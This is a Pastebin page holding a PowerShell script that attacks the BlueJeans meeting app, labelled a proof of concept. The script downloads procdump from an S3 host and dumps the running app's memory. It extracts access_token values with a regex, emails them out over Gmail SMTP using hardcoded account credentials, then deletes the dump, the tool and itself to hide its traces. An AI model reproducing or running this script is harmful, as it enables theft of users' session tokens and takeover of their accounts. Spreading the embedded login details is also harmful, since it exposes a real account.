Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #https://s3.amazonaws.com/wifi101/procdump.exe
- $Client = New-Object System.Net.WebClient
- Start-Sleep -m 2000
- $Client.DownloadFile('https://s3.amazonaws.com/wifi101/procdump.exe', "$Env:USERPROFILE\Documents\procdump.exe")
- Start-Sleep -m 2000
- Start-Process "$Env:USERPROFILE\AppData\Local\BlueJeans\BlueJeans.exe" -WorkingDirectory "$Env:USERPROFILE\Documents\" -WindowStyle Hidden
- Start-Sleep -m 8000
- $app = "$Env:USERPROFILE\Documents\procdump.exe"
- $programid="BlueJeans.exe"
- $argument1 = '-ma'
- $argument2 = "$Env:USERPROFILE\Documents\"
- $argument3='-accepteula'
- $argument4='-o'
- $argument5="$Env:USERPROFILE\Documents\bluejeans.dmp"
- & $app $argument1 $programid $argument3 $argument4 $argument5
- $input_path = "$Env:USERPROFILE\Documents\bluejeans.dmp"
- $output_file = "$Env:USERPROFILE\Documents\hack.txt"
- $regex ='\baccess_token\=(.*)\b'
- select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
- $smtpClient = new-object system.net.mail.smtpClient
- $smtpClient.Host = 'smtp.gmail.com'
- $smtpClient.Port = 587
- $smtpClient.EnableSsl = $true
- $SMTPClient.Credentials = New-Object System.Net.NetworkCredential("allwindaniel007@gmail.com", "Lenovo@345");
- $emailfrom = "allwindaniel007@gmail.com"
- $emailto = "allwindaniel007@gmail.com"
- $subject = "Bluejeans Acces Tokens"
- $body = "Captured Acces Tokens - POC"
- $emailMessage = New-Object System.Net.Mail.MailMessage
- $emailMessage.From = $EmailFrom
- $emailMessage.To.Add($EmailTo)
- $emailMessage.Subject = $Subject
- $emailMessage.Body = $Body
- $emailMessage.Attachments.Add("$Env:USERPROFILE\Documents\hack.txt")
- $SMTPClient.Send($emailMessage)
- Start-Sleep -m 3000
- Stop-Process -processname BlueJeans
- Start-Sleep -m 8000
- Remove-Item "$Env:USERPROFILE\Documents\hack.txt","$Env:USERPROFILE\Documents\bluejeans.dmp","$Env:USERPROFILE\Documents\procdump.exe","$Env:USERPROFILE\Documents\hack.ps1"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement